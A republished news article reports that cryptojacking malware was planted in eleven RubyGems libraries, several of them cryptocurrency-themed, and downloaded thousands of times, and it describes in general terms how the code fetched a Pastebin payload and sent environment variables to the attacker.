Cryptojacking Code Found in Eleven Open Libraries, Thousands Infected

11 open-source code libraries written in Ruby contained cryptojacking code and were downloaded thousands of times.

A Cryptojacking code was found in 11 open-source code libraries written in Ruby, which have been downloaded thousands of times.

Industry news outlet Decrypt reported on Aug. 21 that cryptojacking code has been added to 11 open-source Ruby libraries distributed on the RubyGems platform. Per the report, the infected libraries were downloaded over three and a half thousand times.

Hackers reportedly downloaded the software, infected it with malware, and subsequently re-posted it on RubyGems. 

The malicious code was first noticed by a GitHub user, who posted about the issue on Aug. 19. He pointed out that, when executed, the library downloaded additional code from text hosting service Pastebin, which then triggered the malicious mining.

Furthermore, the malware also sent the address of the infected host to the attacker alongside environment variables which may have included credentials.

Some users suggested that Rubygems contributors should enable two-factor authentication on their accounts given that, if compromised, they could be used to infect many systems.

A seemingly targeted attack

Five of the libraries infected were cryptocurrency-specific, with names like doge-coin, bitcoin_vanity, coin_base and blockchain_wallet. The last two were reportedly the most downloaded, with coin_base counting 424 downloads and blockchain_wallet 423.

As Cointelegraph recently reported, cybersecurity company Varonis has discovered a new cryptojacking virus, dubbed “Norman,” that aims to mine the cryptocurrency Monero (XMR) and evade detection.

Visit the USSA News store!
Click this link for the original source of this article.
Author: Adrian Zmudzinski


This content is courtesy of, and owned and copyrighted by, https://cointelegraph.com and its author. This content is made available by use of the public RSS feed offered by the host site and is used for educational purposes only. If you are the author or represent the host site and would like this content removed now and in the future, please contact the USSANews.com administrator by using the contact form located in the top-left menu. Your request will be immediately honored. Please visit https://cointelegraph.com for more terrific, conservative content. The owner of this website may be paid to recommend American Bullion. The content of this website, including the positive review of American Bullion, the negative review of its competitors, and any other information may not be independent or neutral.

USSANews.com USSANews.com